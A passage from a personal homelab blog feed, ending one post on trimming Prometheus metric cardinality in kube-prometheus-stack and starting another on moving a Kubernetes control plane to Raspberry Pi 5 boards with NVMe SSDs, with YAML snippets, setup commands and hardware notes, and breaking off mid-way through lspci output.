<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kubelet</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cAdvisorMetricRelabelings</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">labeldrop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">id</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">labeldrop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">name</span>
</span></span></code></pre></div><p>With that, those two labels are dropped completely before the samples are
ingested. This will not have an immediate effect on the size of new blocks, because
we&rsquo;re not gathering fewer samples - we&rsquo;re just getting fewer series for all of
the cAdvisor metrics. The larger impact comes once blocks are compacted into bigger
ones: compaction does not remove any samples, but it can deduplicate series in the
index. For example, with those two labels still in there, I would get larger daily
blocks on days with my regular host or service updates. During both of those
maintenance actions, I&rsquo;m restarting and rescheduling Pods, which would lead to both
labels changing - so I would suddenly have two series in the same block for what is
pretty much the same Pod, just because the <code>name</code> and <code>id</code> labels changed with the
restart.</p>
<p>I went through the rest of the list in that section and applied different actions.
They ranged from leaving a label untouched, like the <code>pod</code> label, because it&rsquo;s needed
for uniqueness, to dropping entire metrics that use a label. The <code>mountpoint</code> label,
for example, is only used in the <code>node_filesystem_device_error</code> and <code>node_filesystem_readonly</code>
metrics, neither of which is particularly interesting, so I dropped both metrics at
the node_exporter scrape, where they&rsquo;re coming from.</p>
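<p>As a rough sketch, this is one way such a metric drop could look in the
kube-prometheus-stack values, assuming the node-exporter ServiceMonitor is managed
via the bundled prometheus-node-exporter subchart - the exact key names may differ
between chart versions:</p>
<pre tabindex="0"><code>prometheus-node-exporter:
  prometheus:
    monitor:
      metricRelabelings:
        # Drop the two filesystem error metrics entirely, and the
        # long mountpoint label values go away with them.
        - action: drop
          sourceLabels: [__name__]
          regex: node_filesystem_device_error|node_filesystem_readonly
</code></pre>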
<p>I then went through the <code>Highest cardinality metric names</code> section and dropped a
lot of the metrics in there, because they just didn&rsquo;t look very interesting.</p>
<p>See, I&rsquo;m perfectly capable of even dropping entire metrics. I&rsquo;m a responsible
adult! &#x1f979;</p>
<p>But one value in the cardinality section deserves a shout out: <code>etcd_request_duration_seconds_bucket</code>.
That metric is just humongous. It produces a total of 45k series. That&rsquo;s how
many unique label combinations it had seen. That comes from the fact that that
metric has labels for 24 histogram buckets times 6 HTTP operations times 317
different Kubernetes object kinds. Wow.</p>
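<p>If you want to get rid of a metric like that, here is a minimal sketch of how it
could be dropped in the kube-prometheus-stack values, assuming it comes in via the
apiserver ServiceMonitor - again, key names may vary between chart versions:</p>
<pre tabindex="0"><code>kubeApiServer:
  serviceMonitor:
    metricRelabelings:
      # Drop only the bucket series; the _sum and _count series survive,
      # so an average latency can still be computed.
      - action: drop
        sourceLabels: [__name__]
        regex: etcd_request_duration_seconds_bucket
</code></pre>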
<p>One mistake I made during the configuration, and only found just now, is that
the <code>labeldrop</code> actions belong in the metric relabelings, as I wrote above.
I had initially put them into the <code>relabelings</code> config, but that does not work.</p>
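<p>The distinction matters because the <code>relabelings</code> are applied to the scrape target
before the scrape, while the <code>metricRelabelings</code> are applied to the scraped samples
afterwards. Labels like <code>id</code> and <code>name</code> only exist on the samples, so a <code>labeldrop</code>
in the target relabelings has nothing to act on. A minimal sketch of the wrong versus
the working placement, using the kubelet ServiceMonitor keys from the chart:</p>
<pre tabindex="0"><code>kubelet:
  serviceMonitor:
    # Wrong: applied to the target before the scrape, where no id label exists.
    cAdvisorRelabelings:
      - action: labeldrop
        regex: id
    # Right: applied to every scraped sample, which does carry the id label.
    cAdvisorMetricRelabelings:
      - action: labeldrop
        regex: id
</code></pre>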
<p>Those initial fixes and cleanups were done last weekend. I did not see much of a
drop in the overall size of the gathered metrics, so I dug in a little bit more.
That was when I saw that all those cAdvisor metrics - which, at 196 Pods and
at least as many containers, were definitely contributing the most - were
scraped at 10 second intervals. Which is ridiculous. I increased that to 30s
via this setting in the kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kubelet</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cAdvisorInterval</span>: <span style="color:#ae81ff">30s</span>
</span></span></code></pre></div><p>Then I had the idea of checking whether any other ServiceMonitors were also
configured with too short of a scrape interval, and I discovered that Ceph was
also doing 10s by default. I was able to change that in the cluster chart like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">30s</span>
</span></span></code></pre></div><p>One thing I found interesting was that lowering the cAdvisor scrape frequency
measurably dropped Prometheus&rsquo; CPU usage as well:
<figure>
    <img loading="lazy" src="prometheus-cpu-drop.png"
         alt="A screenshot of a Grafana time series plot. It shows relatively consistent CPU usage by Prometheus, fluctuating between 0.13 and 0.2, with very occasional spikes to 0.5. The utilization markedly dropped around 21:38, to fluctuate between 0.075 and 0.15."/> <figcaption>
            <p>CPU usage of the Prometheus container. I increased the cAdvisor scrape interval to 30s around 21:38.</p>
        </figcaption>
</figure>
</p>
<p>Finally, a small misguided adventure in metrics reduction. I saw that among the container
metrics, there were entries for each Pod that had <code>POD</code> as their container name.
I surmised that those were the metrics for the pause container Kubernetes uses to hold
the networking namespace, and I thought I could drop them to reduce ingest a bit
further. But it turned out that this container is actually important,
because it is where all of a Pod&rsquo;s networking metrics are reported. So I had
to revert the drop.</p>
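<p>For the record, the reverted attempt looked roughly like this - a cAdvisor metric
relabeling that throws away every sample with <code>POD</code> as the container name. I&rsquo;m
keeping it here purely as a what-not-to-do:</p>
<pre tabindex="0"><code>kubelet:
  serviceMonitor:
    cAdvisorMetricRelabelings:
      # Do not do this: the POD (pause) container carries the per-Pod network metrics.
      - action: drop
        sourceLabels: [container]
        regex: POD
</code></pre>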
<h2 id="conclusion">Conclusion</h2>
<p>I&rsquo;m just going to stop here, short of the 30 minute reading time limit. &#x1f609;</p>
<p>This project was a very enjoyable success. I of course always welcome any chance
to look at my metrics. And the main goal was reached in full: I&rsquo;ve now
got my metrics in an S3 bucket, and will never have to increase a volume size
again. The downsampling was a really nice bonus, with somewhat smaller storage
requirements after two years and the option of keeping the 1h precision metrics
indefinitely.
The only thing left to wish for is that the Thanos Querier would automatically
query the next lower precision if it doesn&rsquo;t find any raw precision data.</p>
<p>I was also quite happy that this project had me learn a bit more about how
Prometheus stores its data, and it was another welcome trigger to reduce the
metrics ingestion at least a little bit more.</p>
<p>This project has again shown me that I should get a move on and start
scraping more of my services, instead of mostly scraping Kubernetes, Ceph and my
hosts. I would have really loved to show some plots from scraped Prometheus metrics
on the effects of my metric reduction attempts.</p>
<p>Finally, the Thanos block viewer again demonstrates a principle I read in <a href="http://www.catb.org/esr/writings/taoup/html/">The Art of Unix Programming</a>
many years ago: The Rule of Transparency. It&rsquo;s always a good idea to make your
program&rsquo;s inner workings transparent, and the block viewer was genuinely helpful.</p>
<p>So what&rsquo;s next? I decided to continue going down my &ldquo;smaller project&rdquo; list before
starting something big and completely new again. So the next thing will likely
be the migration from Gitea to Forgejo, simply because that&rsquo;s next on the list
of Homelab things to do.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating my Kubernetes Control Plane to Raspberry Pi 5</title>
      <link>https://blog.mei-home.net/posts/control-plane-pi5/</link>
      <pubDate>Mon, 12 May 2025 00:05:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/control-plane-pi5/</guid>
      <description>Migrating my Kube control plane from Pi 4 to Pi 5</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve had problems with the stability of my Kubernetes control plane ever since
I migrated it to three Raspberry Pi 4 from their temporary home on a beefy x86
server. I will be going into more detail about the problem first, describe the
Pi 5 with NVMe a bit, and then describe the migration itself.</p>
<h2 id="the-problem">The problem</h2>
<p>I&rsquo;ve noted in a couple of recent posts that I&rsquo;ve started seeing instability
in my Kubernetes control plane. The main symptom was my HashiCorp Vault
Pods going down regularly. This was pretty visible because I have not automated
unsealing for Vault, so each time the Pods restart, I have to manually
enter the unseal passphrase.</p>
<p>But looking closer at the nodes, all three Raspberry Pi 4 4GB showed a very high
number of restarts for all of their Pods:</p>
<ul>
<li>kube-vip, which I use to provide a virtual IP for the k8s API</li>
<li>kube-apiserver</li>
<li>kube-scheduler</li>
<li>kube-controller-manager</li>
<li>Ceph MON</li>
</ul>
<p>The only component which wasn&rsquo;t regularly restarted was etcd. I tried to dig
really deeply into the issue, but was never able to figure out what really
triggered the restarts. There were
a lot of timeouts in the logs of etcd, kube-apiserver and kube-vip. There were
also some really long, multi-minute periods where the etcd cluster was unable to
elect a new leader because the members thought they were in different terms. In the
end it always healed itself - I never needed to manually intervene to get the
cluster back. But it didn&rsquo;t look good.</p>
<p>The following two plots illustrate this by showing the <code>apiserver_request_aborts_total</code>
and the <code>etcd_request_errors_total</code> metrics for the period where the Pi 4 were
running the control plane. Both metrics show the rate, summed up over all
label values.</p>
<p>Here is the <code>etcd_request_errors_total</code> metric:
<figure>
    <img loading="lazy" src="etcd-errors.png"
         alt="A screenshot of a Grafana time series plot. It shows the rate of errors in the etcd component of my Kubernetes cluster. The plot goes from April 11th to May 2nd. In the beginning, until April 13th, the plot is straight zero. Starting around 00:00 on the 13th, there are constant errors shown. Only at a rate of, at max, 0.6 per second, and most of the time far below that, but still - there were no errors at all before that. Then there&#39;s a large spike around 12:00 on May 2nd up to a rate of three errors per second, after which the plot goes back to straight zero until the end."/> <figcaption>
            <p>Rate of etcd request errors per second. I finished the migration of the control plane to the Pi 4 around 00:00 on April 13th. I migrated to the Pi 5 on May 1st.</p>
        </figcaption>
</figure>
</p>
<p>While the error rate is not <em>that</em> high, it&rsquo;s pretty clear that it started after
I migrated the control plane to the Pi 4 around April 12th, and vanished
completely after I migrated to the Pi 5.
That large spike on May 1st was when I accidentally bumped the USB-to-SATA adapter
of one of the Pi 4 nodes while another one was already down for replacement. The
single remaining Pi 4 did not take that very well. &#x1f605;</p>
<p>Here is a slightly different view of the aborted apiserver requests during the
same period:
<figure>
    <img loading="lazy" src="apiserver-aborts.png"
         alt="A screenshot of a Grafana time series plot. It shows the rate of aborts in the apiserver component of my Kubernetes cluster. The plot goes from April 11th to May 2nd. In the beginning, until April 11th, the plot is straight zero. Starting around 00:00 on the 11th, there are constant aborts shown. Only at a rate of, at max, 0.1 per second, and most of the time far below that, but still - there were no errors at all before that. Then there&#39;s a large spike around 12:00 on May 2nd up to a rate of 0.25 aborts per second, after which the plot goes back to straight zero until the end."/> <figcaption>
            <p>Rate of apiserver request errors per second. I finished the migration of the control plane to the Pi 4 around 00:00 on April 13th. I migrated to the Pi 5 on May 1st.</p>
        </figcaption>
</figure>
</p>
<p>These two plots already show pretty conclusively that something was wrong after
I migrated the control plane to the Pi 4. And that the migration to the Pi 5
fixed the issue. Here is a final plot, showing the container restarts for the
kube-apiserver, kube-scheduler, kube-controller-manager and Vault:
<figure>
    <img loading="lazy" src="container-restarts.png"
         alt="Another Grafana plot over the same time period. This time it shows the number of container restarts. Again, the plot is mostly flat up to about 00:00 on April 13th. Then it has several periods of 20&#43; restarts, but also some periods with no restarts at all. In the evening of April 19th, there is a couple of large spikes up to 120 restarts. The plot goes flat again after May 1st."/> <figcaption>
            <p>Container restarts, plotted as the increase over the past hour.</p>
        </figcaption>
</figure>
</p>
<p>It&rsquo;s clear here that the problem was not persistent - there were several days
where no restart at all happened. But the problem was definitely there. One
major issue was that I couldn&rsquo;t really figure out what triggered the restarts.
I spent several hours looking at the logs on the control plane hosts, but wasn&rsquo;t
able to identify the real culprit. It looked like at some point etcd just got
overwhelmed, which made first the local apiserver and then finally the kubelet
error out, leading to a round of container restarts.</p>
<p>There were also no clear indications in the machine&rsquo;s metrics. The only thing I
found was some increased IOWAIT time on the CPUs, but at the same time it didn&rsquo;t
look like the IO was actually overwhelmed.</p>
<p>I ended up with the conclusion that I was asking just a bit too much of the poor
Pi 4, and decided that this was the right moment to look at the Pi 5 and its
NVMe-capable PCIe connection.</p>
<h2 id="the-raspberry-pi-5">The Raspberry Pi 5</h2>
<p>When looking for a replacement for the three Raspberry Pi 4, it was pretty clear
that I would be going with the new Pi 5. Most of my Homelab already consists of
Pis, and at least the Pis are supported by an array of mainstream Linux
distros instead of empty promises. The main new feature of the Pi 5 for me is
that it exposes a PCIe Gen2 x1 lane by default. This
lane can be switched to Gen3, but that&rsquo;s currently not officially supported.
With this PCIe lane comes the ability to connect an NVMe SSD and even boot
off of it. As I suspected that part of my problem with the Pi 4 control plane
nodes was IO, this made me hopeful that a Pi 5 would be able to cope.</p>
<p>I also decided to buy the <a href="https://www.raspberrypi.com/products/raspberry-pi-5/">Pi 5</a>
in the 8 GB variant, as opposed to the 4 GB Pi 4 variants that formed my control plane
before. I don&rsquo;t really see a need for the increased RAM right now - there was
still plenty of free RAM on the 4 GB models. But I wanted to invest in a bit of
future proofing here.</p>
<p>For the cooling I wanted to go passive again. I had a very bad experience with
an actively fanned Pi 4 case shortly after release, back when it was still said
that the Pi 4 needed active cooling. And with my rack sitting right next to my desk,
I want quiet. I bought <a href="https://www.berrybase.de/en/armor-gehaeuse-fuer-raspberry-pi-5-schwarz">this case</a>.
It&rsquo;s very similar to the passive heat sinks I&rsquo;ve been using for the Pi 4.</p>
<p>All the article links in this post will go to <a href="https://www.berrybase.de/en/">berrybase.de</a>,
as that was where I bought the equipment. It&rsquo;s mostly in German, but I&rsquo;m reasonably
sure that you could find the same stuff in many other places.</p>
<p>With cooling covered, I next went hunting for a way to fasten the SSD. A
traditional Pi HAT was off the table, due to the use of the large heat sink.
But after some searching, I found some good reviews of Pimoroni&rsquo;s <a href="https://shop.pimoroni.com/products/nvme-base?variant=41219587178579">NVMe base</a>.
Pimoroni is a pretty trustworthy brand, and they provided some compatibility info
on their page. Plus, they were available in the berrybase shop.</p>
<p>I then had a closer look at Pimoroni&rsquo;s compatibility section for NVMe SSDs,
and finally settled on the <a href="https://europe.kioxia.com/en-europe/personal/ssd/exceria-g2.html">Kioxia Exceria G2</a>.
It was on the compatibility list, was relatively affordable, from a trusted brand
and available at my trusted IT hardware retailer. I bought four of them, three
500 GB models for the new control plane and one 1 TB model, for some future
experiments.</p>
<p>Last but not least, I also had to buy a couple of mounting plates for my
<a href="https://racknex.com/raspberry-pi-rackmount-kit-12x-slot-19-inch-um-sbc-207/">Racknex Pi rack mount</a>.</p>
<p>Overall, this is what one of the new Pis cost me:</p>
<table>
  <thead>
      <tr>
          <th>Item</th>
          <th>Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Raspberry Pi 5 8 GB</td>
          <td>€84,90</td>
      </tr>
      <tr>
          <td>Armor Heat Sink</td>
          <td>€9,90</td>
      </tr>
      <tr>
          <td>Power Supply</td>
          <td>€12,40</td>
      </tr>
      <tr>
          <td>NVMe Base</td>
          <td>€16,50</td>
      </tr>
      <tr>
          <td>500 GB Kioxia NVMe SSD</td>
          <td>€32,90</td>
      </tr>
      <tr>
          <td>Mounting Plate</td>
          <td>€10,80</td>
      </tr>
      <tr>
          <td>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</td>
          <td>&mdash;&mdash;&mdash;</td>
      </tr>
      <tr>
          <td>Total</td>
          <td>€167,40</td>
      </tr>
  </tbody>
</table>
<h3 id="construction">Construction</h3>
<p>With all of things arriving, I could get to my least favorite part of Homelabbing:
Hardware. That was a bit of a challenge in this project, mostly due to the
PCIe flat cable connecting the Pi and the NVMe base. Sadly, I only now realized
that I completely forgot to take pictures of the construction process. So this
is what one of the Pis looks like fully constructed:</p>
<figure>
    <img loading="lazy" src="pi5-finished.jpg"
         alt="A picture of a Raspberry Pi. The Pi 5 itself is covered with a black with a black aluminum heat sink which is about as high as the front IO connectors and covers the entire board, with some cutouts for access to connectors. At the back, a PCIe cable is going from the Pi down to the NVMe base mounted below the Pi. The cables flimsiness and shortness screams &#39;I am a pain to handle&#39;. The entire assembly is mounted onto a sturdy metal piece, with a front part angling up to about two Pis in height, with a large cutout for the Pi&#39;s IO in the front."/> <figcaption>
            <p>A finished Raspberry Pi with connected NVMe all mounted on a Racknex mounting plate. I will leave the tale of the installation of that very short PCIe cable at the back to your nightmares.</p>
        </figcaption>
</figure>

<p>That flat PCIe cable at the back was a bear to install. Getting it fitted to
the Pi was not a big problem. But then getting it fitted to the NVMe base, with
the Pi side already connected, was a nightmare. The cable is
extremely short, and you have to hold up the Pi awkwardly while somehow trying
to connect the cable to the NVMe base.
Pimoroni&rsquo;s install instructions were generally okay, but their proposed order was
to first connect the cable to the base and then connect the Pi side. I found this
entirely impossible. If you look very closely, the heat sink only has a small
cutout to put in the PCIe cable. Threading the cable through that cutout while the
NVMe base is already connected proved impossible, at least at my level of dexterity,
so I went the other way around. That was still a pain. If I had bungled the job on
one of the Pis and had to reseat the cable, you might now be reading a post about my
imminent plan to move my entire Homelab to a few dedicated servers at Hetzner. &#x1f62c;</p>
<p>One important part to note: The M2.5 screws which come with the Pimoroni NVMe base
are long enough to connect the base, the Pi and the heat sink. But they turned
out too short to also fit the mounting plate. I had to order an additional set
of M2.5 x 20mm screws. Those were long enough to hold it all together.</p>
<p>Once deployed, this is what the three Pis looked like in the rack:</p>
<figure>
    <img loading="lazy" src="pi5-mounted.jpg"
         alt="A picture of a Racknex Pi mount in a 19 inch rack. There are twelve slots to mount Raspberry Pis, with 8 currently occupied. On the very left are two Pi 4, each occupying one slot. They are each covered by a large read heat sink. Each one is connected to a SATA SSD via a USB-to-SATA adapter. The SSDs are mounted vertically behind the Pis. On the right side, six slots are occupied with three Pi 5. Each of them has a network cable plugged in. They are covered with a black heat sink. There is definitely not a single speck of dust visible in the entire picture. Not one. You definitely cannot see the outline of three more SATA SSDs vertically mounted until recently behind the three Pi 5."/> <figcaption>
            <p>My three Pi 5 mounted in the Racknex mount on the right. The two Pi 4 on the left, connected to their SATA SSDs, are a similar setup as my control plane Pis had previously.</p>
        </figcaption>
</figure>

<p>Can we all agree on ignoring the fact that you can see where the SSDs for the
Pi 4 control nodes were mounted before? Thank you. &#x1f601;</p>
<h3 id="looking-closer-at-the-pi-5">Looking closer at the Pi 5</h3>
<p>Now that the hardware is built, let&rsquo;s take a closer look at the Pi 5. I have a
fourth Pi, with 16 GB of RAM and a 1 TB SSD, for some later project, and did
some initial testing with it. As with the rest of my Pi fleet, I&rsquo;m using Ubuntu
here, in version 24.04, which is the first release compatible with the Pi 5.</p>
<p>I used the <code>ubuntu-24.04.2-preinstalled-server-arm64+raspi.img.xz</code> image from
<a href="https://cdimage.ubuntu.com/ubuntu/releases/24.04.2/release/">the Ubuntu download page</a>.
But before putting it on a USB stick, I wanted to enable the PCIe Gen3 support.
This is not officially supported, but it worked immediately on all three of my
Pi 5 and I haven&rsquo;t had any issues in the week I&rsquo;ve now been running them.
I started by mounting the image locally:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>losetup -f --show -P ubuntu-24.04.2-preinstalled-server-arm64+raspi.img
</span></span><span style="display:flex;"><span>mount /dev/loop0p1 /mnt/raspi_boot/
</span></span><span style="display:flex;"><span>mount /dev/loop0p2 /mnt/raspi_root/
</span></span></code></pre></div><p>Then I enabled the Gen3 support by adding the following lines to <code>/boot/firmware/config.txt</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ini" data-lang="ini"><span style="display:flex;"><span><span style="color:#66d9ef">[pi5]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">dtparam</span><span style="color:#f92672">=</span><span style="color:#e6db74">pciex1</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">dtparam</span><span style="color:#f92672">=</span><span style="color:#e6db74">pciex1_gen=3</span>
</span></span></code></pre></div><p>Unmounting it all works like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>umount /mnt/raspi_boot/ /mnt/raspi_root/
</span></span><span style="display:flex;"><span>losetup -d /dev/loop0
</span></span></code></pre></div><p>And then I wrote it onto a USB stick with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>dd bs<span style="color:#f92672">=</span>4M <span style="color:#66d9ef">if</span><span style="color:#f92672">=</span>ubuntu-24.04.2-preinstalled-server-arm64+raspi.img of<span style="color:#f92672">=</span>/dev/YOUR_USB_STICK_HERE status<span style="color:#f92672">=</span>progress oflag<span style="color:#f92672">=</span>sync
</span></span></code></pre></div><p>The Pi immediately booted up - I saw it soliciting an IP from my DHCP server.
But I wasn&rsquo;t able to SSH in, because while SSH is enabled in the image, password
login is disabled for security reasons.</p>
<p>But I had come prepared. I had been wanting to get myself a small screen for
debugging boot issues with my Pis for a long time, because I found connecting one
of my main monitors and switching the source around a bit tedious. I ended up
with <a href="https://www.berrybase.de/en/universal-5-0-display-mit-hdmi-vga-eingang-und-resisitivem-touchscreen">this screen</a>.
It&rsquo;s a bit overkill, because it&rsquo;s also a touch screen, but eh. So I
could set up the Pi like this:
<figure>
    <img loading="lazy" src="pi-with-screen.jpg"
         alt="Another picture of a Pi 5. The Pi itself looks similar to the other pictures. The important difference here is that it&#39;s sitting on a desk. It is connected to a relatively small TKL keyboard with a wonderful amount of rainbow puke going on. The center piece is a small 5 inch display. It is connected to both, a USB port and a HDMI port on the Pi. Squinting a bit, the text on the screen is legible, showing a terminal session with a download of an SSH public key and copying that key into the user&#39;s authorized_keys file."/> <figcaption>
            <p>A small 5 inch screen for my Pi experiments was a good idea.</p>
        </figcaption>
</figure>

The screen isn&rsquo;t really something to write home about - the viewing
angles especially are atrocious - but it did its job and allowed me to quickly copy my
SSH key and add it to the default user, <code>ubuntu</code>.</p>
<p>With that finally done came the moment of truth: Would the NVMe SSD be visible? I
felt quite a bit of dread at this moment, mostly because the first thing I would
have to do for debugging was to try reseating that fiddly PCIe cable. But I
got lucky:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@ubuntu:/tmp/disk-mount# lsblk
</span></span><span style="display:flex;"><span>NAME    MAJ:MIN RM   SIZE RO TYPE MOUNTPOINTS
</span></span><span style="display:flex;"><span>loop0     7:0    <span style="color:#ae81ff">0</span>  38.7M  <span style="color:#ae81ff">1</span> loop /snap/snapd/23546
</span></span><span style="display:flex;"><span>loop1     7:1    <span style="color:#ae81ff">0</span>  38.7M  <span style="color:#ae81ff">1</span> loop /snap/snapd/23772
</span></span><span style="display:flex;"><span>sda       8:0    <span style="color:#ae81ff">1</span>  57.3G  <span style="color:#ae81ff">0</span> disk
</span></span><span style="display:flex;"><span>├─sda1    8:1    <span style="color:#ae81ff">1</span>   512M  <span style="color:#ae81ff">0</span> part /boot/firmware
</span></span><span style="display:flex;"><span>└─sda2    8:2    <span style="color:#ae81ff">1</span>  56.8G  <span style="color:#ae81ff">0</span> part /
</span></span><span style="display:flex;"><span>nvme0n1 259:0    <span style="color:#ae81ff">0</span> 931.5G  <span style="color:#ae81ff">0</span> disk /tmp/disk-mount
</span></span></code></pre></div><p>The NVMe SSD was recognized! &#x1f389;</p>
<p>Next question: Was the Gen3 option working? First, I looked at the <code>dmesg</code> output
and found these encouraging lines:</p>
<pre tabindex="0"><code>[    2.123345] brcm-pcie 1000110000.pcie: Forcing gen 3
[    2.382834] pci 0000:01:00.0: 7.876 Gb/s available PCIe bandwidth, limited by 8.0 GT/s PCIe x1 link at 0000:00:00.0 (capable of 31.504 Gb/s with 8.0 GT/s PCIe x4 link)
</code></pre><p>I went one step further and also checked <code>lspci</code>, because that could have also
been some other PCIe Gen 3 link:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>lspci -vv
</span></span><span style="display:flex;"><span>0000:01:00.0 Non-Volatile memory controller: KIOXIA Corporation NVMe SSD <span style="color:#f92672">(</span>rev 01<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>prog-if <span style="color:#ae81ff">02</span> <span style="color:#f92672">[</span>NVM Express<span style="color:#f92672">])</span>
</span></span><span style="display:flex;"><span>	Subsystem: KIOXIA Corporation NVMe SSD
</span></span><span style="display:flex;"><span>	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
</span></span><span style="display:flex;"><span>	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL<span style="color:#f92672">=</span>fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx-
</span></span><span style="display:flex;"><span>	Latency: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Interrupt: pin A routed to IRQ <span style="color:#ae81ff">42</span>
</span></span><span style="display:flex;"><span>	Region 0: Memory at 1b00000000 <span style="color:#f92672">(</span>64-bit, non-prefetchable<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>size<span style="color:#f92672">=</span>16K<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>80<span style="color:#f92672">]</span> Express <span style="color:#f92672">(</span>v2<span style="color:#f92672">)</span> Endpoint, MSI <span style="color:#ae81ff">00</span>
</span></span><span style="display:flex;"><span>		DevCap:	MaxPayload <span style="color:#ae81ff">256</span> bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited
</span></span><span style="display:flex;"><span>			ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset+ SlotPowerLimit 0W
</span></span><span style="display:flex;"><span>		DevCtl:	CorrErr+ NonFatalErr+ FatalErr+ UnsupReq+
</span></span><span style="display:flex;"><span>			RlxdOrd+ ExtTag+ PhantFunc- AuxPwr- NoSnoop+ FLReset-
</span></span><span style="display:flex;"><span>			MaxPayload <span style="color:#ae81ff">256</span> bytes, MaxReadReq <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>		DevSta:	CorrErr- NonFatalErr- FatalErr- UnsupReq- AuxPwr- TransPend-
</span></span><span style="display:flex;"><span>		LnkCap:	Port <span style="color:#75715e">#0, Speed 8GT/s, Width x4, ASPM L1, Exit Latency L1 &lt;64us</span>
</span></span><span style="display:flex;"><span>			ClockPM- Surprise- LLActRep- BwNot- ASPMOptComp+
</span></span><span style="display:flex;"><span>		LnkCtl:	ASPM Disabled; RCB <span style="color:#ae81ff">64</span> bytes, Disabled- CommClk+
</span></span><span style="display:flex;"><span>			ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
</span></span><span style="display:flex;"><span>		LnkSta:	Speed 8GT/s, Width x1 <span style="color:#f92672">(</span>downgraded<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>			TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt-
</span></span><span style="display:flex;"><span>		DevCap2: Completion Timeout: Range ABCD, TimeoutDis+ NROPrPrP- LTR+
</span></span><span style="display:flex;"><span>			 10BitTagComp- 10BitTagReq- OBFF Not Supported, ExtFmt+ EETLPPrefix-
</span></span><span style="display:flex;"><span>			 EmergencyPowerReduction Not Supported, EmergencyPowerReductionInit-
</span></span><span style="display:flex;"><span>			 FRS- TPHComp- ExtTPHComp-
</span></span><span style="display:flex;"><span>			 AtomicOpsCap: 32bit- 64bit- 128bitCAS-
</span></span><span style="display:flex;"><span>		DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LTR+ 10BitTagReq- OBFF Disabled,
</span></span><span style="display:flex;"><span>			 AtomicOpsCtl: ReqEn-
</span></span><span style="display:flex;"><span>		LnkCap2: Supported Link Speeds: 2.5-8GT/s, Crosslink- Retimer- 2Retimers- DRS-
</span></span><span style="display:flex;"><span>		LnkCtl2: Target Link Speed: 8GT/s, EnterCompliance- SpeedDis-
</span></span><span style="display:flex;"><span>			 Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS-
</span></span><span style="display:flex;"><span>			 Compliance Preset/De-emphasis: -6dB de-emphasis, 0dB preshoot
</span></span><span style="display:flex;"><span>		LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete+ EqualizationPhase1+
</span></span><span style="display:flex;"><span>			 EqualizationPhase2+ EqualizationPhase3+ LinkEqualizationRequest-
</span></span><span style="display:flex;"><span>			 Retimer- 2Retimers- CrosslinkRes: unsupported
